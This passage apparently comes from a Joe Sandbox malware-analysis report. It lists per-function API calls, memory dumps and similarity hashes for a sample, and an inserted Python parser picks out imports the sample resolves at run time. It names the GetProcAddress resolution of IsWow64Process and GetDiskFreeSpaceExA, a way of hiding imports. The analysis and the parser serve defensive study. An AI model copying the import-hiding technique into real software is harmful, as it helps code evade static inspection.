                                                                                  • Opcode ID: fa0100f1ba1be966c1a4cb08252745032906c23393827c68f0a9c61bdcde82df
                                                                                  • Instruction ID: fa5def963580afa149755648a4c259c2d500571b963c315ef6223eec1b6a4738
                                                                                  • Opcode Fuzzy Hash: fa0100f1ba1be966c1a4cb08252745032906c23393827c68f0a9c61bdcde82df
                                                                                  • Instruction Fuzzy Hash: 3BF01D70A04909A2EF002BA2EE0A66F7AF9AF95702F8604A4D595F0084DE318879C696
                                                                                  APIs
                                                                                  • __EH_prolog3.LIBCMT ref: 6A714A84
                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 6A714AA1
                                                                                  • __CxxThrowException@8.LIBCMT ref: 6A714AAF
                                                                                    • Part of subcall function 6A7013A2: RaiseException.KERNEL32(?,?,00000000,?), ref: 6A7013E4
                                                                                    • Part of subcall function 6A6E69A0: std::exception::exception.LIBCMT ref: 6A6E69CE
                                                                                  Strings
                                                                                  • invalid string position, xrefs: 6A714A89
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                  • String ID: invalid string position
                                                                                  • API String ID: 3355147766-1799206989
                                                                                  • Opcode ID: 2d5eb7cb2dbe915335c97a8e113ce5200962e5e13ca7f84e7ee2e2e68dbfd2ec
                                                                                  • Instruction ID: c3b6e02e64366dba9fa9176ce397b611d9f60520dd04c7ea60e185313380414c
                                                                                  • Opcode Fuzzy Hash: 2d5eb7cb2dbe915335c97a8e113ce5200962e5e13ca7f84e7ee2e2e68dbfd2ec
                                                                                  • Instruction Fuzzy Hash: 8EF039B2915218ABCB10DAD1CA88DDEBBBCAB40269F490425E304AB541DF749E0CC7E4
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0BEA0386
                                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0BEA0397
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                  • API String ID: 1646373207-3712701948
                                                                                  • Opcode ID: 4fe5f810d7f5f4a2aff0749bc52099fdf4184f64a6d0c6319de6e1e2c751dca1
                                                                                  • Instruction ID: 0a98aa461d7befe9b21983003ebe047cef0d4f7cc4ad0070cc16007404906101
                                                                                  • Opcode Fuzzy Hash: 4fe5f810d7f5f4a2aff0749bc52099fdf4184f64a6d0c6319de6e1e2c751dca1
                                                                                  • Instruction Fuzzy Hash: F5D05E707203C2DFDB40BBA264C265A27DCC34031BF50382B91004D202D7B09D4C8358
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?,6A6E1A04,?,?,6A6D184E,?), ref: 6A6DBF26
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 6A6DBF2D
                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,6A6E1A04,?,?,6A6D184E,?), ref: 6A6DBF51
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressCurrentHandleModuleProcProcess
                                                                                  • String ID: IsWow64Process$kernel32
                                                                                  • API String ID: 4190356694-3789238822
                                                                                  • Opcode ID: 90898232cca29c1aa08faadb47f83698130a463a31296ffcbea1d6a3c491f8c5
                                                                                  • Instruction ID: 42a5bf1d8e510fe5f84464e1b2fb997a93cd7e1d6ac6d443baf398bbfa9dc591
                                                                                  • Opcode Fuzzy Hash: 90898232cca29c1aa08faadb47f83698130a463a31296ffcbea1d6a3c491f8c5
                                                                                  • Instruction Fuzzy Hash: 83C01276449560664A5233E48B8958927F848196D231809A4FE42F9114CF545C005971
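The records above are Joe Sandbox's per-function IDA-plugin output: each lists the API calls a function makes (calls reached through a callee carry a "Part of subcall function" marker), the memory dump the code was lifted from, and the similarity hashes. The two records immediately above also show the sample resolving GetDiskFreeSpaceExA and IsWow64Process by name through GetModuleHandleA/GetProcAddress, which are imports a static scan of the dump's import table will not list. The Python below is an added example, not Joe Sandbox or report code: it parses records in this format into objects and lists the run-time-resolved names per mapped image. SAMPLE is a constructed, abridged copy of three records from this section; the regexes, the ApiCall/FunctionRecord names and the RESOLVERS set are the example's own assumptions. Joe's argument recovery is heuristic (in the IsWow64Process record the name sits on the GetModuleHandleA call rather than on GetProcAddress), so the example scans every resolver call instead of GetProcAddress alone.

```python
"""Parse Joe Sandbox IDA-plugin function records (the 'APIs' / 'Memory Dump
Source' / 'Similarity' blocks in this report). Added example for this page,
not Joe Sandbox code; SAMPLE is a constructed, abridged copy of three records
from this report (Associated/snapshot/hash lines dropped)."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0BEA0386
• GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0BEA0397
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
APIs
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?,6A6E1A04,?,?,6A6D184E,?), ref: 6A6DBF26
• GetProcAddress.KERNEL32(00000000), ref: 6A6DBF2D
• GetCurrentProcess.KERNEL32(00000000,?,6A6E1A04,?,?,6A6D184E,?), ref: 6A6DBF51
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Similarity
• API ID: AddressCurrentHandleModuleProcProcess
APIs
• __flush.LIBCMT ref: 6A7001BE
• __locking.LIBCMT ref: 6A7001E5
  • Part of subcall function 6A701068: __getptd_noexit.LIBCMT ref: 6A701068
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Similarity
• String ID:
"""

API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<fn>[A-Za-z0-9_:]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^Source File: (?P<dump>\S+), Offset: (?P<base>[0-9A-Fa-f]+)")
# An API/module name: identifier-shaped and not an 8-digit hex stack value.
NAME_RE = re.compile(r"(?![0-9A-Fa-f]{8}$)[A-Za-z_][A-Za-z0-9_.]*")
# Names handed to these calls are imports the dump's import table will not list.
RESOLVERS = {"GetProcAddress", "GetModuleHandleA", "GetModuleHandleW",
             "LoadLibraryA", "LoadLibraryW"}
# subcall_of holds the callee address when Joe lists the call as 'Part of subcall'.
ApiCall = namedtuple("ApiCall", "name module args ref subcall_of")

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    image_base: int = 0
    similarity: dict = field(default_factory=dict)

def parse_records(text):
    """One FunctionRecord per 'APIs' heading; bullets are filed by section."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):            # a section heading
            section = line
            if section == "APIs":               # every record opens with APIs
                rec = FunctionRecord()
                records.append(rec)
            continue
        if rec is None:
            continue
        body = line[1:].strip()
        if section == "APIs" and (m := API_RE.match(body)):
            args = m["args"].split(",") if m["args"] else []
            rec.apis.append(ApiCall(m["fn"], m["mod"], args, m["ref"], m["sub"]))
        elif section == "Memory Dump Source" and (m := SRC_RE.match(body)):
            rec.image_base = int(m["base"], 16)
        elif section == "Similarity":
            key, _, value = body.partition(":")
            rec.similarity[key.strip()] = value.strip()
    return records

def dynamically_resolved_names(rec):
    """Name-like arguments on the record's own resolver calls. Joe's argument
    recovery is heuristic (the name can sit on GetModuleHandleA rather than
    GetProcAddress, as in the IsWow64Process record), so every resolver
    call is scanned rather than GetProcAddress alone."""
    names = []
    for c in rec.apis:
        if c.name in RESOLVERS and c.subcall_of is None:
            names += [a for a in c.args if NAME_RE.fullmatch(a) and a not in names]
    return names

def summarize(records):
    """Per mapped image: APIs called directly plus run-time-resolved names."""
    out = {}
    for rec in records:
        e = out.setdefault(rec.image_base, {"apis": set(), "resolved": []})
        e["apis"].update(c.name for c in rec.apis if c.subcall_of is None)
        e["resolved"] += [n for n in dynamically_resolved_names(rec) if n not in e["resolved"]]
    return out
```

Feed `parse_records` the text of the whole function listing (after stripping the "Download File" link labels) and `summarize` yields, per image base, the direct API set and the names resolved at run time; subcall entries are kept on the record but excluded from the per-image API set so that a CRT helper is not counted once per caller.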
                                                                                  APIs
                                                                                  • __flush.LIBCMT ref: 6A7001BE
                                                                                  • __fileno.LIBCMT ref: 6A7001DE
                                                                                  • __locking.LIBCMT ref: 6A7001E5
                                                                                  • __flsbuf.LIBCMT ref: 6A700210
                                                                                    • Part of subcall function 6A701068: __getptd_noexit.LIBCMT ref: 6A701068
                                                                                    • Part of subcall function 6A700D34: __decode_pointer.LIBCMT ref: 6A700D3F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                  • String ID:
                                                                                  • API String ID: 3240763771-0
                                                                                  • Opcode ID: 95493f2f965f632cd2afebb89a859025c36bf254d5a3e4afddc1329766e0a83b
                                                                                  • Instruction ID: 3cc547f2f54788e03cc6feb0ea26335312a17b2ce45557c3b9a014d3c574b547
                                                                                  • Opcode Fuzzy Hash: 95493f2f965f632cd2afebb89a859025c36bf254d5a3e4afddc1329766e0a83b
                                                                                  • Instruction Fuzzy Hash: AB41B3B1A00A04AFDB148FA9CA8859EBBF6AF91370F228539D46597141DF70DA4BCB40
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6FC9B5
                                                                                    • Part of subcall function 6A6EE27D: __cftof.LIBCMT ref: 6A6EE28E
                                                                                  • GetFileTime.KERNEL32(?,?,?,?), ref: 6A6FC9EC
                                                                                  • GetFileSizeEx.KERNEL32(?,?), ref: 6A6FCA04
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$SizeTime__cftof_memset
                                                                                  • String ID:
                                                                                  • API String ID: 2749391713-0
                                                                                  • Opcode ID: fb36764bf0c965cd68c697bd566196e2aa0114559abfa71b7e6c56281a3e6e5d
                                                                                  • Instruction ID: 610bec02f20e4656e4f6297775beb74fbea51aa80b608b8d9171887ffa83af7f
                                                                                  • Opcode Fuzzy Hash: fb36764bf0c965cd68c697bd566196e2aa0114559abfa71b7e6c56281a3e6e5d
                                                                                  • Instruction Fuzzy Hash: 04512C71904705AFC724CFA8C885D9AB7F9FB09310B058E2EE5A6E3690EB30F545CB64
                                                                                  APIs
                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0BEA242B
                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0BEA2447
                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0BEA24BE
                                                                                  • VariantClear.OLEAUT32(?), ref: 0BEA24E7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                  • String ID:
                                                                                  • API String ID: 920484758-0
                                                                                  • Opcode ID: 33014472c2517b7c2202ae716b1191d877759e0b0b6c6cf28ba03e1954dbec12
                                                                                  • Instruction ID: e8e91b4d1ca6d640bc0d218d3b05b3a54e9b8fa32c1efa7cb272bf2cef3fbefd
                                                                                  • Opcode Fuzzy Hash: 33014472c2517b7c2202ae716b1191d877759e0b0b6c6cf28ba03e1954dbec12
                                                                                  • Instruction Fuzzy Hash: 95410879A012299FCB62EF58CC90AC9B7FCAF59204F0051D5E649BB211DA34BF848F64
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D7B0E
                                                                                    • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
                                                                                  • _memset.LIBCMT ref: 6A6D7B4C
                                                                                  • _memset.LIBCMT ref: 6A6D7B63
                                                                                  • _memset.LIBCMT ref: 6A6D7B80
                                                                                    • Part of subcall function 6A6D5160: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1275148839-0
                                                                                  • Opcode ID: 45ce029a9ce275096bbbf81f268260d5a6e6547c538bbecd7c3626f5ec450ef6
                                                                                  • Instruction ID: 7d2dff2c9ffab181e35b693605c412ff3ebce46b02fe0ce4dd0cad635bf62e77
                                                                                  • Opcode Fuzzy Hash: 45ce029a9ce275096bbbf81f268260d5a6e6547c538bbecd7c3626f5ec450ef6
                                                                                  • Instruction Fuzzy Hash: 2B31D5B1508285AED324DB60D999FDB77EC9B88348F444829E98887112FE70A60CC7A3
                                                                                  APIs
                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0BE9EAD0
                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0BE9EAF4
                                                                                  • GetModuleFileNameA.KERNEL32(500BEFB6), ref: 0BE9EB0F
                                                                                  • LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0BE9EBB3
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
• Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID:
• API String ID: 3990497365-0
• Opcode ID: 208da545e310afa5677eb2b484c8d75990d6aeeb69b40945b3cc2e0bd7375674
• Instruction ID: c0d535e7ef33f794086b95285b138028f992dbe63bd57225ea702b0b7966c8a9
• Opcode Fuzzy Hash: 208da545e310afa5677eb2b484c8d75990d6aeeb69b40945b3cc2e0bd7375674
• Instruction Fuzzy Hash: 6B41E871A0025CAFDF25DB68D885BDDB7F9AB08204F0450E6AA08E7251E774AF8C8F55
APIs
• GetStringTypeA.KERNEL32(00000C00,00000002,?,00000080,?), ref: 0BE9FD4A
• GetThreadLocale.KERNEL32 ref: 0BE9FC7A
  • Part of subcall function 0BE9FBD8: GetCPInfo.KERNEL32(00000000,?), ref: 0BE9FBF1
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID: InfoLocaleStringThreadType
• String ID:
• API String ID: 1505017576-0
• Opcode ID: 1cf7841a9ee3c0786d86a2d78dfa068803ff4da13616b2f64f036296fc7e8c94
• Instruction ID: ccaff33b001b6dcd31a529da715b8ecddb8d6241052b8d8f250c9bb1a49cdd13
• Opcode Fuzzy Hash: 1cf7841a9ee3c0786d86a2d78dfa068803ff4da13616b2f64f036296fc7e8c94
• Instruction Fuzzy Hash: 1B316861A01286AEDF00DFB6F8013A93FD5EF81314F849061D844CB281EBB4DA5DC795
APIs
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: _memset$select
• String ID:
• API String ID: 538464093-0
• Opcode ID: e063163eea1534e1cc5421e5484ed97fde75f03364e544e88ddb5411cfa37448
• Instruction ID: 8a3dadd2c5aee13a4fe2f0a533c07e5d8f7f647827250db7ca34920a07e225b8
• Opcode Fuzzy Hash: e063163eea1534e1cc5421e5484ed97fde75f03364e544e88ddb5411cfa37448
• Instruction Fuzzy Hash: 0E31C4B150E7809FD320DF64D8C496BB7F5FB85308F11092DF59683601EF35A9498B62
APIs
  • Part of subcall function 0BEB52E4: RtlEnterCriticalSection.NTDLL(0BEFDB2C), ref: 0BEB52EC
  • Part of subcall function 0BEB52E4: RtlLeaveCriticalSection.NTDLL(0BEFDB2C), ref: 0BEB52F9
  • Part of subcall function 0BEB52E4: RtlEnterCriticalSection.NTDLL(00000038), ref: 0BEB5302
  • Part of subcall function 0BEB8500: GetDC.USER32(00000000), ref: 0BEB8556
  • Part of subcall function 0BEB8500: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0BEB856B
  • Part of subcall function 0BEB8500: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0BEB8575
